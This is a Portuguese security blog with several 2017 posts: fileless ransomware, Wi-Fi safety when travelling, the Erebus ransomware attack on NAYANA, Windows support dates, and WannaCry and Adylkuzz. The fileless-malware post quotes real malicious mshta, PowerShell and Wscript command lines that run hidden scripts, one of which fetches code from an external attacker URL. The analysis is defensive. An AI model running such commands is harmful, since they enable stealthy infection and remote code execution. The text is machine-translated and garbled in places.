Tocando Agora

Bem Vindo

Bem vindo ao nosso blog, aonde discutimos vários tópicos do dia-a-dia, e um parcial de nossa rádio web (www.computersservice.radio.br)

sábado, 15 de julho de 2017


Infecções sem arquivo - o último truque de Ransomware


Se alguém pensou que o susto do Ransomware WannaCry de maio de 2017 era ruim, é apenas o começo. Todos os anos, à medida que são pagos mais resgates, os cibercriminosos têm mais capital para investir em novas tecnologias e técnicas. Uma de suas técnicas mais promissoras é infecções sem arquivo ou ataques de script.

Historicamente, o malware e agora o ransomware furtivamente um programa em um computador, e então, abertamente ou secretamente, tentaram a execução desse arquivo. O tópico comum nesses ataques é que um arquivo é baixado e, em seguida, tenta executar. A arquitetura do software antivírus emprega um driver de sistema de arquivos. Esse driver trava o arquivo e depois determina se ele pode ser executado.

Um malware sem arquivo não descarta um arquivo e ignora o driver do sistema de arquivos do AV mainstream. Em vez disso, os scripts são escritos e executados através de conhecidos mecanismos de script, como Powershell, MSHTA, Cscript e Wscript. Mostre e diga a hora.

C: \ WINDOWS \ system32 \ mshta.exe "javascript: QNm90c =" 8YNUG ";
S07R = novo ActiveXObject ("WScript.Shell"); E91eHqEE = "l"; L21MJb = S07R.RegRead ("HKCU \\ software \\ lfxqiypm \\ qkkqsiqrqk"); G0dn1w = "jSJKZ"; Eval (l21MJb); GQEXz2t = "apyD"; "
 
O comando acima invoca o MSHTA, que é um conhecido bem conhecido aplicativo Microsoft. O comando chama Javascipt, que por sua vez chama Wscript para executar um script a partir de uma chave de registro com caracteres aleatórios. Uma vez que o script reside em uma chave de registro, não há nenhum arquivo para o driver do sistema de arquivos para analisar.
 
"C: \ WINDOWS \ System32 \ WindowsPowerShell \ v1.0 \ powershell.exe" iex $ env: kuihcdc

O comando acima instrui o Powershell, outro mecanismo de script Microsoft válido, para executar um script a partir de uma variável de ambiente com caracteres aleatórios. Uma vez que o script reside em uma variável de ambiente em vez de um arquivo, o driver do sistema de arquivos tem visibilidade zero neste tipo de atividade.

Wscript // B // E: JScript OTTYUADAF "gexywoaxor" "http://hit.thincoachmd.com/?oq=hpKckf7tVaATgjxCHeAFpyI4PUA8X_qyqiEnVmhDP
g5_U_kDbMAl19pucJOw6mF4&es_sm=140&

O comando acima executa o Wscript, outro mecanismo de script Microsoft válido e, em seguida, muda para o Javascript e executa o script diretamente de um site com uma seqüência de consulta gnarly. Vamos pensar sobre isso. O comando acima está instruindo wscript a executar o código diretamente de um site externo sem um arquivo atingindo o driver do sistema de arquivos.
 
Se alguém faz uma pesquisa na estranha string "gexywoaxor", descobre-se que esse malware é um trojan bancário chamado Zeus Panda descoberto por Forcepoint.

O artigo está datado de julho de 2016 e o ​​PC Matic bloqueou a amostra em novembro de 2016, 4 meses depois.


Amostra de ponto de força
Amostra PC Matic
Encontro
Julho de 2016
Novembro de 2016
Mecanismo de script
Wscript
Wscript
Nome do arquivo de script
R3ak.tmp
OTTYUADAF
Chave de criptografia
Gexwoaxor
Gexwoaxor
URL
Ytbuybytvtrcevrtbyybyttvrcrvbyynubyvrvgh
Hit.thincoachmd.com
 
Nesses quatro meses, houve mudanças visíveis no método de ataque, no entanto, a chave de criptografia crítica "gexywoaxor" permaneceu inalterada. O fato de que uma nova chave de criptografia não era necessária era um sinal de que este vírus tinha sucesso na entrega da sua carga útil.

Os ataques de script ou infecções sem arquivo estão aqui hoje. 25% de todos os blocos de PC Matic de malware estão no nível de script. De forma justa, no ambiente de hoje, com freqüência, um ataque de script envolve o lançamento de um arquivo mais tarde para ser executado. Nesse caso, há um segundo ponto em que uma abordagem de placa de arquivos / lista negra pode capturar e bloquear a intrusão. O problema é que nem todos os ataques de script soltam um arquivo e isso representa um buraco de segurança no antivírus da sua empresa.

sexta-feira, 14 de julho de 2017

Segurança Wi-Fi quando viajando - Dicas e precauções a serem tomadas

 
A segurança cibernética não é apenas proteger seu PC e dispositivos móveis dos ataques de Trojans e Malware; É mais sobre a segurança de suas redes. Você precisa proteger todas as partes da sua rede. Um Wi-Fi público gratuito e aberto geralmente traz um sorriso no rosto de todos, mas o fato é que essas redes abertas de Wi-Fi públicas são altamente propensas a ataques cibernéticos, especialmente quando você está viajando. Existem vários perigos de usar um ponto de acesso Wi-Fi público . Nesta publicação, aprenderemos sobre a segurança Wi-Fi e algumas dicas e precauções a serem tomadas para acessar de forma segura a Internet ao viajar. Essas maneiras simples protegerão sua rede dos ataques Wi-Fi em qualquer lugar.


Para evitar esses ataques, primeiro você precisa saber de que tipo de ataques sua rede Wi-Fi é propensa. Alguns dos ataques mais difíceis e prejudiciais incluem Sniffing, Sidejacking e Engenharia Social.

1 - Sniffing , que é um ataque passivo, baseia-se basicamente em um software sniffer que rouba os dados que passam por uma rede de informática. Enquanto os sniffers de pacotes são realmente projetados para hackers éticos, solução de problemas e análise de dados, os cibercriminosos o usam para intrusar em sua rede e roubar os dados. Alguns ataques de sniffing típicos incluem: sniff de LAN, sniff de protocolo, ARP sniff e sniffing de senha da Web. Os hackers podem roubar suas senhas sobre Wi-Fi usando esta técnica!

2 - Sidejacking , também conhecido como seqüestro de sessão é um tipo de ataque Wi-Fi onde os atacantes usam seus cookies para representar sua conta e entrar em qualquer site. Enquanto os sites codificam seu processo de login, eles nunca criptografam seus cookies tornando sua conta vulnerável. Uma rede Wi-Fi aberta compartilha os cookies da sessão através do ar, o que torna sua rede ainda mais vulnerável e propensa a atacar.

3 - A engenharia social é um tipo de ataque onde os atacantes enganam os usuários para quebrar seus sistemas de segurança regulares. É mais como enganar os usuários. Os ataques de engenharia social de uso comum incluem: clique em iscas, phishing , scareware e pretexto.

Agora, quando você está ciente desses ataques comuns de Wi-Fi, vamos falar sobre algumas dicas e precauções a serem tomadas para acessar de forma segura a Internet ao viajar.

Segurança Wi-Fi quando viajando

Mantenha o seu WiFi desligado

Geralmente, todos temos o hábito de manter nosso WiFi aberto em nossos dispositivos móveis que se conecta automaticamente a uma rede WiFi pública aberta que não é segura. Mantenha o seu WiFi desligado e ligue-o apenas quando quiser usar a internet. Não é recomendado usar as conexões WiFi públicas a menos que você tenha algo realmente importante a fazer. As conexões WiFi abertas que não estão protegidas com uma senha geralmente são perigosas, pois qualquer pessoa que use o mesmo WiFi pode interferir e cortar seu dispositivo. Todos os seus detalhes de login estão no ar.

Usar VPN

Uma rede privada virtual, muitas vezes denominada VPN, é um tipo de túnel privado da sua rede, o que lhe garante a intrusão indesejada. Durante a viagem, muitas vezes usamos conexões Wi-Fi públicas para nossas transações de dinheiro on-line, que podem ser perigosas. Mas se você estiver usando uma VPN, esconderá todas as suas atividades na internet dos atacantes. É bastante fácil configurar uma VPN para dispositivos móveis, laptops e tablets. Existem vários softwares VPN gratuitos que você pode usar.

As estações de cobrança públicas não são seguras

Você já ouviu falar sobre Juice Jacking ? É uma maneira de roubar todos os dados armazenados no seu telefone através do cabo de carregamento USB. Quando você usa a porta USB de estações de carregamento público, você está realmente concedendo aos hackers para acessar todos os seus dados sem saber. É sempre melhor ter seu próprio banco de energia e não usar as estações de carregamento público para seus telefones celulares.

Configurações de compartilhamento

Antes de se conectar ao Wi-Fi público, verifique se as configurações de compartilhamento em seus dispositivos estão desligadas. Manter essas configurações, ON, leva a um roubo de dados obviamente.

Carregar um dispositivo habilitado para Ethernet

Sim, não podemos imaginar nossas vidas sem a internet, mas usar o WiFi público não é uma boa opção. Se você é viajante de negócios e precisa necessitar do acesso à internet em qualquer lugar, sugere-se transportar sua própria porta Ethernet e um dispositivo habilitado para Ethernet.

Hotspot pessoal

Embora esta seja uma opção cara, mas é a melhor para os viajantes de negócios, que precisam estar online sempre. Um ponto de acesso privado / pessoal vem em planos pré-pagos e pós-pagos. O hotspot pessoal protege sua atividade online e criptografa todos os seus detalhes. Todas as suas atividades on-line, incluindo as transações de dinheiro, são garantidas.

Wi-Fi Dicas para viajantes internacionais

Quando você está viajando internacionalmente, você realmente precisa ficar conectado com as pessoas em seu país de origem e a internet é a única saída. Assim, torna-se ainda mais importante manter o cuidado e a vigilância sobre o uso das redes WiFi públicas e tomar algumas etapas básicas para garantir-se em hotspots WiFi públicos para proteger seus dados ao usar redes sem fio não seguras.

  • Você precisa usar um software VPN, pois criptografará todos os dados que seu PC envia para que não seja hackeável.
  • Monitore sua conexão Bluetooth em locais públicos para garantir que outros não interceptem sua transferência de dados.
  • Usar as redes não criptografadas é altamente arriscado, pois todos os seus detalhes são facilmente hackeáveis.
  • Manter o WiFi desligado quando não está em uso é outra dica muito importante.
  • Além disso, é preciso evitar o download ou a instalação de atualizações nos dispositivos quando viaja internacionalmente. Isso ocorre porque os hackers costumam enganar os usuários com tais notificações de atualização para entrar no seu sistema.
É melhor se você pode usar uma conexão por cabo ou comprar um plano de dados ilimitado para o seu dispositivo e parar de usar o Wi-Fi público completamente

Ransomware sequestra 153 servidores Linux e empresa teve que pagar R$ 3 milhões para descriptografar.

 

Ransomware sequestra 153 servidos Linux e empresa teve que pagar R$ 3 milhões de resgate.

O provedor de hospedagem  web sul-coreano concordou em pagar US$ 1 milhão em bitcoins para crackers depois que um ransomware Linux infectou seus 153 servidores, criptograficando 3.400 sites de negócios e seus dados hospedados neles.

De acordo com uma publicação no blog publicada pela NAYANA, a empresa de hospedagem na web, este evento infeliz aconteceu no dia 10 de junho, quando o malware do Ransomware atingiu seus servidores de hospedagem e o atacante exigiu 550 bitcoins (mais de US$ 1,6 milhão) para desbloquear os arquivos criptografados.


No entanto, a empresa negociou mais tarde com os cibercriminosos e concordou em pagar 397,6 bitcoins (cerca de US$ 1,01 milhão) em três parcelas para que seus arquivos fossem descriptografados.

A empresa de hospedagem já pagou duas parcelas no momento da redação e pagaria a última parcela do resgate depois de recuperar dados de dois terços dos servidores infectados.

De acordo com a empresa de segurança Trend Micro, o Ransomware usado no ataque foi o Erebus que foi detectado em setembro do ano passado e foi visto em fevereiro deste ano com as capacidades de desvio de controle de conta de usuário do Windows.

Uma vez que os servidores de hospedagem estavam sendo executados no kernel do Linux 2.6.24.2, os pesquisadores acreditam que o Ransomware do Erebus Linux pode ter usado vulnerabilidades conhecidas, como SUTY VW; Ou uma aplicação local do Linux para assumir o acesso raiz do sistema.

"A versão do Apache NAYANA usada é executada como um usuário de ninguém (uid = 99), o que indica que uma exploração local também pode ter sido usada no ataque", observa o pesquisador.

"Além disso, o site da NAYANA usa o Apache versão 1.3.36 e PHP versão 5.1.4, ambos lançados em 2006."

Erebus, o ransomware que visa principalmente usuários na Coréia do Sul, criptografa documentos de escritório, bancos de dados, arquivos e arquivos multimídia usando o algoritmo RSA-2048 e, em seguida, anexa-os com uma extensão .ecrypt antes de exibir a nota de resgate.

"O arquivo primeiro é codificado com criptografia RC4 em blocos de 500kB com chaves geradas aleatoriamente", dizem os pesquisadores. "A chave RC4 é então codificada com o algoritmo de criptografia AES, que é armazenado no arquivo. A chave AES é novamente criptografada usando o algoritmo RSA-2048 que também é armazenado no arquivo."

A chave pública que é gerada localmente é compartilhada, enquanto a chave privada é criptografada usando criptografia AES e outra chave gerada aleatoriamente.

De acordo com a análise realizada pelos pesquisadores da Trend Micro, a descriptografia de arquivos infectados não é possível sem se apoderar das chaves RSA.

Então, a única maneira segura de lidar com ataques de resgate é a prevenção. Como recomendamos anteriormente, a melhor defesa contra o Ransomware é criar conscientização dentro das organizações, bem como para manter backups que são rodados regularmente.

A maioria dos vírus é introduzida abrindo anexos infectados ou clicando em links para malwares geralmente em e-mails de spam. Portanto, NÃO CLIQUE em links fornecidos em e-mails e anexos de fontes desconhecidas.

Além disso, assegure-se de que seus sistemas estejam executando a versão mais recente dos aplicativos instalados.


Fonte: The Hacker News

quinta-feira, 25 de maio de 2017

Descubra Quando a Sua Versão do Windows Deixará de Receber Suporte

O recente ataque do ransomware WannaCry demonstra a importância das atualizações automáticas de segurança dos computadores. Não importa o quanto você seja cuidadoso, o malware pode explorar uma brecha na rede e obter controle do seu sistema a menos que você instale patches de segurança.

Porém, a Microsoft não oferece as atualizações de segurança para todos as versões do sistema operacional Windows para o resto da vida. Além disso, às vezes, a empresa deixa de oferecer o suporte mainstream, mas disponibiliza o estendido.

Conforme publicou o How-To Geek, a diferença entre um e outro é que ao lançar uma versão do Windows pela primeira vez, a companhia oferece o suporte mainstream por cinco anos, com direito às atualizações de segurança e suporte gratuito da equipe da Microsoft. Já o estendido, que também dura cinco anos, só dá direito às atualizações, enquanto o suporte é pago.

Depois desse período de 10 anos, o sistema operacional deixa de receber os patches de segurança. A Microsoft até chega a abrir algumas exceções para empresas que ainda utilizam as versões antigas, mas raras são as vezes que as atualizações de segurança chegam para o público em geral depois que expira o prazo do suporte.

No caso do WanaCry, a companhia liberou uma atualização geral para Windows XP, Windows 8 e Windows Server 2003, que já não são suportados oficialmente, por ser tratar de uma brecha de segurança grave.

A Microsoft sempre define as datas exatas que deixará de oferecer o suporte à uma versão, que podem ser conferidas (https://support.microsoft.com/en-us/help/13853/windows-lifecycle-fact-sheet). Veja quando termina o suporte da Microsoft para o Windows 7, 8 e 10:

O Windows 7 é compatível com atualizações de segurança até o dia 14 de janeiro de 2020. No entanto, o usuário precisa ter o Service Pack 1 instalado para obter as demais atualizações.

O Windows 8.1 é compatível com as atualizações de segurança até o dia 10 de janeiro de 2023.

O Windows 10 é suportado até o dia 14 de outubro de 2025. Você deve ter a versão mais recente instalada para continuar recebendo as atualizações.

A empresa poderia estender essas datas se quiser, mas nunca encerrar o suporte antes.

segunda-feira, 22 de maio de 2017

Pesquisadores acreditam que ataque maior que o WannaCry poderá acontecer

Malware, por ser silencioso, pode ter feito ainda mais vítimas no mundo.

O ataque virtual que aconteceu na última semana ainda está rendendo alguns prejuízos em várias partes do mundo. De acordo com especialistas em segurança, a brecha usada no ataque também já foi utilizada em uma edição anterior, que pode ter vitimado mais máquinas e também usuários do que o atual. Até então, os números somam 200 mil computadores comprometidos no mundo todo.

O ataque anterior foi chamado de Adylkuzz, e utiliza a mesma arma EternalBlue desenvolvida pela NSA e vazada pelo grupo Shadow Brokers. A diferença é método usado: Ao invés de travar o computador e pedir resgate para liberá-lo, o malware instala um software para mineração da criptomoeda Monero, semelhante à Bitcoin, porém, que promete o anonimato de todas as transações.


De acordo com o especialista de segurança Proofpoint, o ataque teve início entre 24 de abril e 2 de maio, agindo de modo mais silencioso.

O modo de agir do Adylkuzz é muito direto, através da brecha EternalBlue, os computadores acabam infectados com um sistema chamado DoublePulsar, que acaba abrindo uma porta dos fundos para a instalação do AdyKuzz.

"As estatísticas iniciais sugerem que esse ataque pode ser em maior escala que o WannaCry, afetando centenas de milhares de computadores e servidores ao redor do mundo", informa a empresa

Diferentemente do WannaCry, não há nenhuma tela informativa sobre um computador infectado. Os sintomas são a perda de acesso a recursos de rede e também lentidão no computador. Sendo assim, por ser mais discreto, ele pode ter feito mais vítimas, o que o deixa impressionante e perigoso.

Para prevenção do Adylkuzz a prevenção é a mesma, ou seja, atualização do Windows.

Wanna Cry 2.0: Estão circulando novas versões do malware

O ransomware vem ganhando novas versões e novos ataques devem acontecer em breve

O exploit que originou o ciberataque massivo foi roubado da NSA, agência de segurança dos Estados Unidos, afirma Microsoft.

O Ransomware Wanna Crypt0r foi o malware desvastador que atingiu 99 países com inúmeros ataques, que de acordo com a Microsoft em sua publicação sobre “Lições do Ciberataque”, afirmou envolvimento da NSA com a brecha do Windows XP. Já a Kaspersky e Symantec afirmam ter encontrado algum resquício de códigos vindos da Coréia do Norte, para a briga começar a ficar pesada.

As brechas estavam sendo utilizadas para vigilância e espionagem, mas os exploits da Agência de Segurança Nacional norte-americana foram vazados, assim como outras informações pelo WikiLeaks.

Brad Smith, da Microsoft diz "Seguidamente, os exploits nas mãos de governos têm vazado em domínios públicos e causado um vasto dano. Em um cenário equivalente, é como se os mísseis Tomahawk do exército dos EUA tivessem sido roubados. Os governos precisam tratar a ameaça desse ataque como um despertador. Eles precisam adotar uma abordagem diferente e colocar as mesmas leis aplicadas à armas do mundo real no ciberespaço".

Logo após os ataques a Microsoft disponibilizou um patch para corrigir a brecha explorada pelo ransomware WannaCry, mas para a Avast, os computadores ainda estão vulneráveis, em torno de 15% dos usuários do antivírus não realizaram a atualização MS17-010 da Microsoft.

Uma nova versão do ransomware foi encontrada pela empresa de segurança Check Point na segunda-feira (15), cujo vírus seria capaz de infectar 3,6 mil computadores por hora, mas ainda bem que a empresa conseguiu neutralizar o respectivo vírus evitando seus ataques.

“Posso garantir que existem versões sem os domínios Kill Switch” afirma o diretor de pesquisa global da Kaspersky Labs, Costin Raiu. Isso impede que cessem os ataques, pois o ransomware está ganhando novas versões que levam certo tempo para descobrir como pará-lo.

Com ataques cibernéticos acontecendo vale seguir as orientações de especialistas realizando um backup seguro e baixar todas as atualizações da Microsoft, diminuindo a probabilidade de seu computador ficar vulnerável aos ataques, tome cuidado para não clicar em nenhum e-mail suspeito ou qualquer mensagem que apareça na sua tela. Cuidado.

terça-feira, 16 de maio de 2017

Ataque atinge computadores de 99 países e hackers arrecadam o equivalente a 80 mil dólares

O Windows foi o escolhido pelos hackers por ser o mais utilizado no mundo todo e a moeda virtual Bitcoin facilitou a solicitação de resgate

Foi na Inglaterra que um jovem de 22 anos conseguiu colocar um fim nos ataques virtuais sem precedentes. Quando o ataque começou, na sexta-feira, era meio dia, afetando mais de 125 mil pessoas em poucas horas; usuários de 99 países obtiveram seus computadores sequestrados.

Como foi o ataque?

O golpe funciona da seguinte maneira, você recebe um e-mail que supostamente parece confiável, mas quando clica no anexo o computador passa automaticamente a ser infectado com o ransomware (WannaCrypt) e a partir deste momento todos os computadores que estão ligados a ele ficam infectados.



Todos os seus dados e arquivos são criptografados, você passa a não ter mais acesso a eles. Então, logo após aparece uma mensagem na tela do seu computador dizendo que para voltar a ter acesso somente pagando o valor do “resgate” mínimo de US$ 300 dólares em moeda virtual Bitcoin, quase R$ 1.000 reais. Acredita-se que os hackers já tenham conseguido arrecadar em torno de US$ 80 mil dólares através dos pagamentos, através de contas bitcoin vinculadas ao código fonte.

Como o ataque funciona?

O vírus explora é uma falha gigantesca no sistema Windows, o mais utilizado no mundo. Segundo a Microsoft, o problema havia sido corrigido em março, a partir deste momento quem realizou a atualização do sistema estava protegido.

Mas como nem todas empresas, principalmente empresas de órgãos públicos não atualizam o sistema operacional com frequência, pelos altos custos que geram, ficando mais sucetíveis a ataques deste tipo.

Quem foi prejudicado?

O sistema de saúde britânico foi o primeiro a identificar o ataque, que atingiu desde o governo russo até ao sistema de entregas de encomendas americanas, assim como universidades na China e na Indonésia, sistema de trens da Alemanha, empresas de telecomunicações na Espanha e Portugal, a montadora francesa Renault teve que parar sua produção em algumas de suas unidades.

Ataque no Brasil

No Brasil, no estado do Rio de janeiro, todos os computadores do Instituto Nacional de Segurança Social (INSS) foram infectados pelo vírus passando a ser desligados. A Petrobras e a Telefônica também foram alvos do ataque.

O INSS, em nota, comunicou que todos os serviços das agências foram suspensos na sexta-feira (12) depois do anúncio de ciberataques na rede mundial de computadores. Segundo o órgão os atendimentos que foram marcados para a respectiva data serão reagendados ‘A Data de Entrada de Requerimento, DER, dos cidadãos agendados será resguardada”.

Páginas da Pevidência Social e do Ministério do Trabalho, além de outras páginas do governo federal, estavam fora do ar, assim como seus telefones sem atendimento.

Investigações

Segundo a polícia Europeia é necessária a realização de uma complexa investigação internacional para identificar quem está por trás do ataque. O que se sabe até o momento é quem desenvolveu a tecnologia utilizada pelo ataque foi o governo americano, através da Agência de Segurança Nacional (NSA).

A NSA produz as armas das guerras virtuais, vírus os quais atacam sistemas cibernéticos para realizar espionagens de governos e terroristas, por exemplo. Mas o sistema foi invadido por hackers no ano passado, momento em que conseguiram roubar várias dessas armas virtuais, sendo que uma delas foi usada para fazer o vírus que atacou o mundo na sexta-feira (12).

Parou, mas não por muito tempo !!

O jovem inglês conseguiu descobrir um gatilho que fez com que o ataque cessasse por um tempo, mas segundo ele, a qualquer momento os hackers podem descobrir o que ele conseguiu fazer e voltarem a atacar a qualquer instante.

Os especialistas no assunto sugerem que se atualize o sistema Windows e o sistema de antivírus no computador, e que posteriormente se faça a aquisição de um HD externo, uma memória que não está conectada a internet para guardar os arquivos e dados mais importantes, obtendo assim uma maior proteção.

Consequências

No Brasil, em São Paulo, na cidade do interior São José do Rio Preto, técnicos ainda estão trabalhando para tentar recuperar 55 máquinas do Ministério Público Estadual.

Já na capital de São Paulo, o Hospital Sírio Libanês teve o sistema de áreas administrativas comprometidas sendo recuperadas aos poucos, o que não veio a prejudicar o atendimento do hospital.

Em todo país mais de 14 estados e o Distrito Federal foram alvos dos ataques ou passaram a tomar ações preventivas para evitá-lo.

A Kaspersky Lab, fabricante russa de software de segurança cibernética, disse que seus pesquisadores observaram desde sexta-feira mais de 45.000 ataques em 74 países. Segundo a Avast, fabricante de software de segurança comunicou que identificaram 57.000 infecções em 99 países, sendo que Rússia, Taiwan e Ucrânia foram os principais alvos.

Já os hospitais e clínicas presentes no Reino Unido foram obrigadas a recusar pacientes porque tiveram seus computadores infectados pelo novo ransomware que se espalhou de forma muito rápida pelo mundo misturando todos os dados dos pacientes, exigindo para desfazer a bagunça o pagamento de US$ 600 dólares.

Ainda a maior empresa de entregas do mundo, a FedEx Corp, está entre as companhias que obtiveram o sistema Windows da Microsoft Corp afetados.

Segundo o engenheiro de segurança da Norton, Nelson Barbosa, “ eles sabiam que através do sistema operacional Windows, o mais utilizado pelo mundo todo, seria possível atingir o maior número de pessoas e obter consequentemente um maior lucro”.

Ataques cibernéticos geralmente possuem apenas um alvo, mas desta vez o objetivo foi infectar o maior número possível de computadores para ganhar muito dinheiro através da solicitação de resgate para cada máquina atingida para liberar o acesso do usuário.

A forma realizada para o pagamento foi a moeda digital Bitcoin, que ninguém carrega na carteira, facilitando a ação dos criminosos pois não há nenhuma organização que controle as realizações com a moeda virtual.

Para Fernando Marcondes, economista, “nossa evolução é digital, as facilidades são digitais, mas é uma pena que estejam sendo usadas mais para o mau do que para o bem, pela falta de regulamentação”.

Compartilhe essa notícia com seus amigos, ajude a propagar esta informação para evitar novos ataques.